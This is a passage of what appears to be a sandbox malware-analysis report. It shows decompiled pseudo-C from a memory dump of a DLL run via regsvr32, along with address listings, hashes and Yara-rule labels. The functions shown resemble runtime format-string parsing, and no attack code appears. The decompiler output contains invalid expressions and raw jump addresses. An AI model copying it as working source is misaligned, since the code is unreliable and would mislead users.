				r10d = 0x30;
				_t205 =  ==  ? _t236 : _t202 + 1 + _t168;
				r15b =  ~r15b;
				asm("sbb al, al");
				 *_t205 = (_t74 & 0x000000e0) + 0x70;
				if ( *_t236 - r12b < 0) goto 0x800350da;
				 *((char*)(_t205 + 1)) = 0x2b;
				_t206 = _t205 + 2;
				goto 0x800350e5;
				 *((char*)(_t206 + 1)) = 0x2d;
				_t207 = _t206 + 2;
				_t181 =  ~(( *_t213 >> 0x34) - _t216);
				 *_t207 = r10b;
				_t224 = _t207;
				if (_t181 - 0x3e8 < 0) goto 0x80035127;
				_t191 = (_t189 >> 7) + (_t189 >> 7 >> 0x3f);
				 *_t207 = __r10 + _t191;
				_t208 = _t207 + 1;
				_t182 = _t181 + _t191 * 0xfffffc18;
				if (_t208 != _t224) goto 0x8003512d;
				if (_t182 - 0x64 < 0) goto 0x8003515b;
				_t194 = (_t191 + _t182 >> 6) + (_t191 + _t182 >> 6 >> 0x3f);
				 *_t208 = __r10 + _t194;
				_t209 = _t208 + 1;
				if (_t209 != _t224) goto 0x80035166;
				if (_t182 + _t194 * 0xffffff9c - 0xa < 0) goto 0x80035191;
				 *_t209 = __r10 + (_t194 >> 2) + (_t194 >> 2 >> 0x3f);
				_t210 = _t209 + 1;
				 *_t210 = (r8b & 0x000007ff) + r10b;
				 *((intOrPtr*)(_t210 + 1)) = r12b;
				if (_v32 == r12b) goto 0x800351b0;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return r12d;
			}




















































                                                                                                    0x180034e74
                                                                                                    0x180034e74
                                                                                                    0x180034e77
                                                                                                    0x180034e7b
                                                                                                    0x180034e7f
                                                                                                    0x180034e83
                                                                                                    0x180034e98
                                                                                                    0x180034e9b
                                                                                                    0x180034e9e
                                                                                                    0x180034ea9
                                                                                                    0x180034eae
                                                                                                    0x180034eb5
                                                                                                    0x180034eb8
                                                                                                    0x180034ebc
                                                                                                    0x180034eca
                                                                                                    0x180034ecc
                                                                                                    0x180034ed1
                                                                                                    0x180034ed1
                                                                                                    0x180034ed6
                                                                                                    0x180034ed8
                                                                                                    0x180034edd
                                                                                                    0x180034ef4
                                                                                                    0x180034f00
                                                                                                    0x180034f08
                                                                                                    0x180034f0c
                                                                                                    0x180034f0f
                                                                                                    0x180034f1a
                                                                                                    0x180034f1f
                                                                                                    0x180034f23
                                                                                                    0x180034f28
                                                                                                    0x180034f2d
                                                                                                    0x180034f31
                                                                                                    0x180034f33
                                                                                                    0x180034f36
                                                                                                    0x180034f43
                                                                                                    0x180034f4b
                                                                                                    0x180034f5a
                                                                                                    0x180034f62
                                                                                                    0x180034f64
                                                                                                    0x180034f68
                                                                                                    0x180034f7a
                                                                                                    0x180034f7c
                                                                                                    0x180034f7f
                                                                                                    0x180034f82
                                                                                                    0x180034f92
                                                                                                    0x180034fae
                                                                                                    0x180034fb9
                                                                                                    0x180034fbb
                                                                                                    0x180034fbe
                                                                                                    0x180034fca
                                                                                                    0x180034fd3
                                                                                                    0x180034fd5
                                                                                                    0x180034fd8
                                                                                                    0x180034fdb
                                                                                                    0x180034fde
                                                                                                    0x180034fe3
                                                                                                    0x180034fe5
                                                                                                    0x180034fe8
                                                                                                    0x180034ffb
                                                                                                    0x180035001
                                                                                                    0x180035007
                                                                                                    0x180035017
                                                                                                    0x180035028
                                                                                                    0x18003502c
                                                                                                    0x180035030
                                                                                                    0x180035032
                                                                                                    0x180035035
                                                                                                    0x180035039
                                                                                                    0x180035040
                                                                                                    0x180035045
                                                                                                    0x18003504b
                                                                                                    0x180035060
                                                                                                    0x180035062
                                                                                                    0x180035062
                                                                                                    0x18003506c
                                                                                                    0x18003506e
                                                                                                    0x180035071
                                                                                                    0x180035074
                                                                                                    0x180035079
                                                                                                    0x18003507b
                                                                                                    0x18003507f
                                                                                                    0x180035084
                                                                                                    0x180035086
                                                                                                    0x18003508a
                                                                                                    0x18003508c
                                                                                                    0x18003508e
                                                                                                    0x180035093
                                                                                                    0x18003509e
                                                                                                    0x1800350a6
                                                                                                    0x1800350af
                                                                                                    0x1800350b3
                                                                                                    0x1800350b6
                                                                                                    0x1800350bc
                                                                                                    0x1800350ce
                                                                                                    0x1800350d0
                                                                                                    0x1800350d4
                                                                                                    0x1800350d8
                                                                                                    0x1800350da
                                                                                                    0x1800350de
                                                                                                    0x1800350e2
                                                                                                    0x1800350e5
                                                                                                    0x1800350e8
                                                                                                    0x1800350f2
                                                                                                    0x18003510c
                                                                                                    0x180035113
                                                                                                    0x180035115
                                                                                                    0x18003511f
                                                                                                    0x180035125
                                                                                                    0x18003512b
                                                                                                    0x180035148
                                                                                                    0x18003514f
                                                                                                    0x180035151
                                                                                                    0x18003515e
                                                                                                    0x180035164
                                                                                                    0x180035185
                                                                                                    0x180035187
                                                                                                    0x180035194
                                                                                                    0x180035196
                                                                                                    0x1800351a2
                                                                                                    0x1800351a9
                                                                                                    0x1800351d0

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: gfffffff
                                                                                                    • API String ID: 3215553584-1523873471
                                                                                                    • Opcode ID: eeb0974434d85447deee76596bbf5da75a803caf4fd2dc4d03381ad9d0f0b953
                                                                                                    • Instruction ID: 5d9f2fb4272bae7ef4edff981651f2ce1c6fd9482636f874089908a7ede511d8
                                                                                                    • Opcode Fuzzy Hash: eeb0974434d85447deee76596bbf5da75a803caf4fd2dc4d03381ad9d0f0b953
                                                                                                    • Instruction Fuzzy Hash: FA9145737057CC86EB678F2991403EE6B95A729BC0F05C121EBC9073A6DE39D61AC301
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001B314 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 69%
                                                                                                    			E0000000118001B314(signed int __edi, signed short __rbx, void* __rcx, void* __rdx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t67;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t77;
				signed int _t89;
				signed int _t92;
				void* _t95;
				signed int _t105;
				signed int _t108;
				intOrPtr _t120;
				signed short* _t140;
				signed short* _t141;
				signed short* _t142;
				void* _t144;
				void* _t154;
				signed int* _t160;
				signed short* _t164;
				void* _t167;
				void* _t169;
				void* _t172;
				signed int* _t173;

				_t162 = __rbp;
				_t154 = __rdx;
				_t140 = _t164;
				_t140[4] = __rbx;
				_t140[8] = __rbp;
				_t140[0xc] = __rsi;
				_t140[0x10] = __rdi;
				_t144 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rbp) goto 0x8001b357;
				_t67 = E0000000118002E69C(_t140);
				 *_t140 = 0x16;
				E0000000118002E4F0(_t67);
				goto 0x8001b5a7;
				if ( *(__rcx + 0x18) == __rbp) goto 0x8001b33f;
				_t108 = __edi | 0xffffffff;
				r12d = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
				_t70 =  *((intOrPtr*)(__rcx + 0x478));
				if (_t70 == 3) goto 0x8001b5a4;
				if (_t70 != 2) goto 0x8001b392;
				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x8001b5a4;
				_t141 =  *((intOrPtr*)(__rcx + 0x480));
				_t173 = __rcx + 0x34;
				_t160 = __rcx + 0x38;
				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
				 *(__rcx + 0xde8) = _t108;
				 *(__rcx + 0xdec) = _t108;
				 *_t173 = 0;
				 *_t160 = 0;
				 *(__rcx + 0x18) = _t141;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				_t71 =  *_t141 & 0x0000ffff;
				 *(__rcx + 0x42) = _t71;
				if (_t71 == 0) goto 0x8001b57a;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001b57f;
				if (( *(__rcx + 0x42) & 0x0000ffff) - r12w - 0x5a > 0) goto 0x8001b400;
				goto 0x8001b402;
				_t104 = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				if (E000000011800273FC(__rcx, _t172) == 0) goto 0x8001b5a0;
				_t77 =  *((intOrPtr*)(_t144 + 0x2c));
				if (_t77 == 8) goto 0x8001b590;
				_t120 = _t77;
				if (_t120 == 0) goto 0x8001b55a;
				if (_t120 == 0) goto 0x8001b545;
				if (_t120 == 0) goto 0x8001b50a;
				if (_t120 == 0) goto 0x8001b4c8;
				if (_t120 == 0) goto 0x8001b4c1;
				if (_t120 == 0) goto 0x8001b47f;
				if (_t120 == 0) goto 0x8001b472;
				if (_t77 - 0xfffffffffffffffc != 1) goto 0x8001b5a0;
				E0000000118001FA84(_t144, _t144, _t154, _t160, __rbp);
				goto 0x8001b562;
				E0000000118001E074(_t141, _t144);
				goto 0x8001b562;
				if ( *(_t144 + 0x42) == 0x2a) goto 0x8001b496;
				E0000000118001A098(_t144, _t144, _t160, _t160, _t162, _t169, _t167);
				goto 0x8001b562;
				if (E00000001180026DC4(_t104, _t141, _t144, _t144) == 0) goto 0x8001b5a0;
				if ( *((intOrPtr*)(_t144 + 0x478)) != 1) goto 0x8001b4b9;
				if ( *((intOrPtr*)(_t144 + 0x47c)) != 1) goto 0x8001b566;
				if ( *_t160 >= 0) goto 0x8001b506;
				 *_t160 = _t108;
				goto 0x8001b506;
				 *_t160 = 0;
				goto 0x8001b566;
				if ( *(_t144 + 0x42) == 0x2a) goto 0x8001b4d7;
				goto 0x8001b48c;
				if (E0000000118002691C(_t104, _t141, _t144, _t144) == 0) goto 0x8001b5a0;
				if ( *((intOrPtr*)(_t144 + 0x478)) != 1) goto 0x8001b4f6;
				if ( *((intOrPtr*)(_t144 + 0x47c)) != 1) goto 0x8001b566;
				_t89 =  *_t173;
				if (_t89 >= 0) goto 0x8001b506;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000004;
				 *_t173 =  ~_t89;
				goto 0x8001b562;
				_t92 =  *(_t144 + 0x42) & 0x0000ffff;
				if (_t92 == r12d) goto 0x8001b53f;
				if (_t92 == 0x23) goto 0x8001b539;
				if (_t92 == 0x2b) goto 0x8001b533;
				if (_t92 == 0x2d) goto 0x8001b52d;
				if (_t92 != 0x30) goto 0x8001b566;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000008;
				goto 0x8001b566;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000004;
				goto 0x8001b566;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000001;
				goto 0x8001b566;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | r12d;
				goto 0x8001b566;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000002;
				goto 0x8001b566;
				 *_t173 = 0;
				 *((intOrPtr*)(_t144 + 0x40)) = bpl;
				 *(_t144 + 0x30) = 0;
				 *_t160 = _t108;
				 *((intOrPtr*)(_t144 + 0x3c)) = 0;
				 *((intOrPtr*)(_t144 + 0x54)) = bpl;
				goto 0x8001b566;
				E0000000118001C838(_t144);
				if (1 == 0) goto 0x8001b5a0;
				_t142 =  *((intOrPtr*)(_t144 + 0x18));
				_t105 =  *_t142 & 0x0000ffff;
				 *(_t144 + 0x42) = _t105;
				if (_t105 != 0) goto 0x8001b3d2;
				 *((long long*)(_t144 + 0x18)) =  *((long long*)(_t144 + 0x18)) + 2;
				if (E000000011800277F4(_t142, _t144) == 0) goto 0x8001b5a0;
				goto 0x8001b36b;
				_t95 = E0000000118002E69C(_t142);
				 *_t142 = 0x16;
				E0000000118002E4F0(_t95);
				goto 0x8001b5a7;
				return  *((intOrPtr*)(_t144 + 0x28));
			}
























                                                                                                    0x18001b314
                                                                                                    0x18001b314
                                                                                                    0x18001b314
                                                                                                    0x18001b317
                                                                                                    0x18001b31b
                                                                                                    0x18001b31f
                                                                                                    0x18001b323
                                                                                                    0x18001b333
                                                                                                    0x18001b33d
                                                                                                    0x18001b33f
                                                                                                    0x18001b344
                                                                                                    0x18001b34a
                                                                                                    0x18001b352
                                                                                                    0x18001b35b
                                                                                                    0x18001b35d
                                                                                                    0x18001b367
                                                                                                    0x18001b36b
                                                                                                    0x18001b371
                                                                                                    0x18001b37a
                                                                                                    0x18001b383
                                                                                                    0x18001b38c
                                                                                                    0x18001b392
                                                                                                    0x18001b399
                                                                                                    0x18001b39d
                                                                                                    0x18001b3a1
                                                                                                    0x18001b3a7
                                                                                                    0x18001b3ad
                                                                                                    0x18001b3b3
                                                                                                    0x18001b3b6
                                                                                                    0x18001b3b8
                                                                                                    0x18001b3bc
                                                                                                    0x18001b3bf
                                                                                                    0x18001b3c2
                                                                                                    0x18001b3c5
                                                                                                    0x18001b3cc
                                                                                                    0x18001b3d2
                                                                                                    0x18001b3da
                                                                                                    0x18001b3ef
                                                                                                    0x18001b3fe
                                                                                                    0x18001b40c
                                                                                                    0x18001b40f
                                                                                                    0x18001b41c
                                                                                                    0x18001b422
                                                                                                    0x18001b428
                                                                                                    0x18001b42e
                                                                                                    0x18001b430
                                                                                                    0x18001b439
                                                                                                    0x18001b442
                                                                                                    0x18001b44b
                                                                                                    0x18001b450
                                                                                                    0x18001b455
                                                                                                    0x18001b45a
                                                                                                    0x18001b45f
                                                                                                    0x18001b468
                                                                                                    0x18001b46d
                                                                                                    0x18001b475
                                                                                                    0x18001b47a
                                                                                                    0x18001b487
                                                                                                    0x18001b48c
                                                                                                    0x18001b491
                                                                                                    0x18001b49d
                                                                                                    0x18001b4aa
                                                                                                    0x18001b4b3
                                                                                                    0x18001b4bb
                                                                                                    0x18001b4bd
                                                                                                    0x18001b4bf
                                                                                                    0x18001b4c1
                                                                                                    0x18001b4c3
                                                                                                    0x18001b4d0
                                                                                                    0x18001b4d5
                                                                                                    0x18001b4de
                                                                                                    0x18001b4eb
                                                                                                    0x18001b4f4
                                                                                                    0x18001b4f6
                                                                                                    0x18001b4fb
                                                                                                    0x18001b4fd
                                                                                                    0x18001b503
                                                                                                    0x18001b508
                                                                                                    0x18001b50a
                                                                                                    0x18001b511
                                                                                                    0x18001b516
                                                                                                    0x18001b51b
                                                                                                    0x18001b520
                                                                                                    0x18001b525
                                                                                                    0x18001b527
                                                                                                    0x18001b52b
                                                                                                    0x18001b52d
                                                                                                    0x18001b531
                                                                                                    0x18001b533
                                                                                                    0x18001b537
                                                                                                    0x18001b539
                                                                                                    0x18001b53d
                                                                                                    0x18001b53f
                                                                                                    0x18001b543
                                                                                                    0x18001b545
                                                                                                    0x18001b548
                                                                                                    0x18001b54c
                                                                                                    0x18001b54f
                                                                                                    0x18001b551
                                                                                                    0x18001b554
                                                                                                    0x18001b558
                                                                                                    0x18001b55d
                                                                                                    0x18001b564
                                                                                                    0x18001b566
                                                                                                    0x18001b56a
                                                                                                    0x18001b56d
                                                                                                    0x18001b574
                                                                                                    0x18001b57a
                                                                                                    0x18001b589
                                                                                                    0x18001b58b
                                                                                                    0x18001b590
                                                                                                    0x18001b595
                                                                                                    0x18001b59b
                                                                                                    0x18001b5a2
                                                                                                    0x18001b5c5

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: ee9ca7d9b19463671201d7bc3ea8948448c4f0cea5d878caea00869637589e27
                                                                                                    • Instruction ID: 57c116ca2118beab2c7c8742c09b8492aaf53e6698daf370f05aadc75668f3cb
                                                                                                    • Opcode Fuzzy Hash: ee9ca7d9b19463671201d7bc3ea8948448c4f0cea5d878caea00869637589e27
                                                                                                    • Instruction Fuzzy Hash: 89816E72104E4886EBE69F2580843ED3BA9E70DBC8F58C219FA45C7295DF35C789C715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001BAC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E0000000118001BAC8(signed int __edi, signed short __rbx, void* __rcx, void* __rdx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t67;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t77;
				signed int _t89;
				signed int _t92;
				void* _t95;
				signed int _t105;
				signed int _t108;
				intOrPtr _t120;
				signed short* _t140;
				signed short* _t141;
				signed short* _t142;
				void* _t144;
				signed int* _t160;
				signed short* _t164;
				void* _t167;
				void* _t169;
				void* _t172;
				signed int* _t173;

				_t162 = __rbp;
				_t140 = _t164;
				_t140[4] = __rbx;
				_t140[8] = __rbp;
				_t140[0xc] = __rsi;
				_t140[0x10] = __rdi;
				_t144 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rbp) goto 0x8001bb0b;
				_t67 = E0000000118002E69C(_t140);
				 *_t140 = 0x16;
				E0000000118002E4F0(_t67);
				goto 0x8001bd5b;
				if ( *(__rcx + 0x18) == __rbp) goto 0x8001baf3;
				_t108 = __edi | 0xffffffff;
				r12d = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
				_t70 =  *((intOrPtr*)(__rcx + 0x478));
				if (_t70 == 3) goto 0x8001bd58;
				if (_t70 != 2) goto 0x8001bb46;
				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x8001bd58;
				_t141 =  *((intOrPtr*)(__rcx + 0x480));
				_t173 = __rcx + 0x34;
				_t160 = __rcx + 0x38;
				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
				 *(__rcx + 0xde8) = _t108;
				 *(__rcx + 0xdec) = _t108;
				 *_t173 = 0;
				 *_t160 = 0;
				 *(__rcx + 0x18) = _t141;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				_t71 =  *_t141 & 0x0000ffff;
				 *(__rcx + 0x42) = _t71;
				if (_t71 == 0) goto 0x8001bd2e;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001bd33;
				if (( *(__rcx + 0x42) & 0x0000ffff) - r12w - 0x5a > 0) goto 0x8001bbb4;
				goto 0x8001bbb6;
				_t104 = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				if (E0000000118002750C(__rcx, _t172) == 0) goto 0x8001bd54;
				_t77 =  *((intOrPtr*)(_t144 + 0x2c));
				if (_t77 == 8) goto 0x8001bd44;
				_t120 = _t77;
				if (_t120 == 0) goto 0x8001bd0e;
				if (_t120 == 0) goto 0x8001bcf9;
				if (_t120 == 0) goto 0x8001bcbe;
				if (_t120 == 0) goto 0x8001bc7c;
				if (_t120 == 0) goto 0x8001bc75;
				if (_t120 == 0) goto 0x8001bc33;
				if (_t120 == 0) goto 0x8001bc26;
				if (_t77 - 0xfffffffffffffffc != 1) goto 0x8001bd54;
				E000000011800202FC(_t144, _t144, _t160, __rbp);
				goto 0x8001bd16;
				E0000000118001E560(_t141, _t144);
				goto 0x8001bd16;
				if ( *(_t144 + 0x42) == 0x2a) goto 0x8001bc4a;
				E0000000118001A218(_t144, _t144, _t160, _t160, _t162, _t169, _t167);
				goto 0x8001bd16;
				if (E00000001180026EDC(_t104, _t141, _t144, _t144) == 0) goto 0x8001bd54;
				if ( *((intOrPtr*)(_t144 + 0x478)) != 1) goto 0x8001bc6d;
				if ( *((intOrPtr*)(_t144 + 0x47c)) != 1) goto 0x8001bd1a;
				if ( *_t160 >= 0) goto 0x8001bcba;
				 *_t160 = _t108;
				goto 0x8001bcba;
				 *_t160 = 0;
				goto 0x8001bd1a;
				if ( *(_t144 + 0x42) == 0x2a) goto 0x8001bc8b;
				goto 0x8001bc40;
				if (E00000001180026A34(_t104, _t141, _t144, _t144) == 0) goto 0x8001bd54;
				if ( *((intOrPtr*)(_t144 + 0x478)) != 1) goto 0x8001bcaa;
				if ( *((intOrPtr*)(_t144 + 0x47c)) != 1) goto 0x8001bd1a;
				_t89 =  *_t173;
				if (_t89 >= 0) goto 0x8001bcba;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000004;
				 *_t173 =  ~_t89;
				goto 0x8001bd16;
				_t92 =  *(_t144 + 0x42) & 0x0000ffff;
				if (_t92 == r12d) goto 0x8001bcf3;
				if (_t92 == 0x23) goto 0x8001bced;
				if (_t92 == 0x2b) goto 0x8001bce7;
				if (_t92 == 0x2d) goto 0x8001bce1;
				if (_t92 != 0x30) goto 0x8001bd1a;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000008;
				goto 0x8001bd1a;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000004;
				goto 0x8001bd1a;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000001;
				goto 0x8001bd1a;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | r12d;
				goto 0x8001bd1a;
				 *(_t144 + 0x30) =  *(_t144 + 0x30) | 0x00000002;
				goto 0x8001bd1a;
				 *_t173 = 0;
				 *((intOrPtr*)(_t144 + 0x40)) = bpl;
				 *(_t144 + 0x30) = 0;
				 *_t160 = _t108;
				 *((intOrPtr*)(_t144 + 0x3c)) = 0;
				 *((intOrPtr*)(_t144 + 0x54)) = bpl;
				goto 0x8001bd1a;
				E0000000118001C964(_t144);
				if (1 == 0) goto 0x8001bd54;
				_t142 =  *((intOrPtr*)(_t144 + 0x18));
				_t105 =  *_t142 & 0x0000ffff;
				 *(_t144 + 0x42) = _t105;
				if (_t105 != 0) goto 0x8001bb86;
				 *((long long*)(_t144 + 0x18)) =  *((long long*)(_t144 + 0x18)) + 2;
				if (E00000001180027880(_t142, _t144) == 0) goto 0x8001bd54;
				goto 0x8001bb1f;
				_t95 = E0000000118002E69C(_t142);
				 *_t142 = 0x16;
				E0000000118002E4F0(_t95);
				goto 0x8001bd5b;
				return  *((intOrPtr*)(_t144 + 0x28));
			}























                                                                                                    0x18001bac8
                                                                                                    0x18001bac8
                                                                                                    0x18001bacb
                                                                                                    0x18001bacf
                                                                                                    0x18001bad3
                                                                                                    0x18001bad7
                                                                                                    0x18001bae7
                                                                                                    0x18001baf1
                                                                                                    0x18001baf3
                                                                                                    0x18001baf8
                                                                                                    0x18001bafe
                                                                                                    0x18001bb06
                                                                                                    0x18001bb0f
                                                                                                    0x18001bb11
                                                                                                    0x18001bb1b
                                                                                                    0x18001bb1f
                                                                                                    0x18001bb25
                                                                                                    0x18001bb2e
                                                                                                    0x18001bb37
                                                                                                    0x18001bb40
                                                                                                    0x18001bb46
                                                                                                    0x18001bb4d
                                                                                                    0x18001bb51
                                                                                                    0x18001bb55
                                                                                                    0x18001bb5b
                                                                                                    0x18001bb61
                                                                                                    0x18001bb67
                                                                                                    0x18001bb6a
                                                                                                    0x18001bb6c
                                                                                                    0x18001bb70
                                                                                                    0x18001bb73
                                                                                                    0x18001bb76
                                                                                                    0x18001bb79
                                                                                                    0x18001bb80
                                                                                                    0x18001bb86
                                                                                                    0x18001bb8e
                                                                                                    0x18001bba3
                                                                                                    0x18001bbb2
                                                                                                    0x18001bbc0
                                                                                                    0x18001bbc3
                                                                                                    0x18001bbd0
                                                                                                    0x18001bbd6
                                                                                                    0x18001bbdc
                                                                                                    0x18001bbe2
                                                                                                    0x18001bbe4
                                                                                                    0x18001bbed
                                                                                                    0x18001bbf6
                                                                                                    0x18001bbff
                                                                                                    0x18001bc04
                                                                                                    0x18001bc09
                                                                                                    0x18001bc0e
                                                                                                    0x18001bc13
                                                                                                    0x18001bc1c
                                                                                                    0x18001bc21
                                                                                                    0x18001bc29
                                                                                                    0x18001bc2e
                                                                                                    0x18001bc3b
                                                                                                    0x18001bc40
                                                                                                    0x18001bc45
                                                                                                    0x18001bc51
                                                                                                    0x18001bc5e
                                                                                                    0x18001bc67
                                                                                                    0x18001bc6f
                                                                                                    0x18001bc71
                                                                                                    0x18001bc73
                                                                                                    0x18001bc75
                                                                                                    0x18001bc77
                                                                                                    0x18001bc84
                                                                                                    0x18001bc89
                                                                                                    0x18001bc92
                                                                                                    0x18001bc9f
                                                                                                    0x18001bca8
                                                                                                    0x18001bcaa
                                                                                                    0x18001bcaf
                                                                                                    0x18001bcb1
                                                                                                    0x18001bcb7
                                                                                                    0x18001bcbc
                                                                                                    0x18001bcbe
                                                                                                    0x18001bcc5
                                                                                                    0x18001bcca
                                                                                                    0x18001bccf
                                                                                                    0x18001bcd4
                                                                                                    0x18001bcd9
                                                                                                    0x18001bcdb
                                                                                                    0x18001bcdf
                                                                                                    0x18001bce1
                                                                                                    0x18001bce5
                                                                                                    0x18001bce7
                                                                                                    0x18001bceb
                                                                                                    0x18001bced
                                                                                                    0x18001bcf1
                                                                                                    0x18001bcf3
                                                                                                    0x18001bcf7
                                                                                                    0x18001bcf9
                                                                                                    0x18001bcfc
                                                                                                    0x18001bd00
                                                                                                    0x18001bd03
                                                                                                    0x18001bd05
                                                                                                    0x18001bd08
                                                                                                    0x18001bd0c
                                                                                                    0x18001bd11
                                                                                                    0x18001bd18
                                                                                                    0x18001bd1a
                                                                                                    0x18001bd1e
                                                                                                    0x18001bd21
                                                                                                    0x18001bd28
                                                                                                    0x18001bd2e
                                                                                                    0x18001bd3d
                                                                                                    0x18001bd3f
                                                                                                    0x18001bd44
                                                                                                    0x18001bd49
                                                                                                    0x18001bd4f
                                                                                                    0x18001bd56
                                                                                                    0x18001bd79

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: 350c835bb107a617835a8725e0f09754ff1a2c2e3d037a6d0816ad2fe9151883
                                                                                                    • Instruction ID: f2cb5e36d5c54eafd2eaab4b239f9b7685aa894d762e440c8f517394d5af6212
                                                                                                    • Opcode Fuzzy Hash: 350c835bb107a617835a8725e0f09754ff1a2c2e3d037a6d0816ad2fe9151883
                                                                                                    • Instruction Fuzzy Hash: 5C817172104A5886EBFA9F2990853EC3BE8F309BC8F248115FA45C7299EF31C64DCB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001B840 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 56%
                                                                                                    			E0000000118001B840(signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t89;
				signed int _t99;
				unsigned int _t107;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t124;
				unsigned int _t131;
				intOrPtr* _t149;
				intOrPtr _t164;
				signed int _t171;
				intOrPtr* _t175;

				_t173 = __rbp;
				_t171 = __rsi;
				_t149 = _t175;
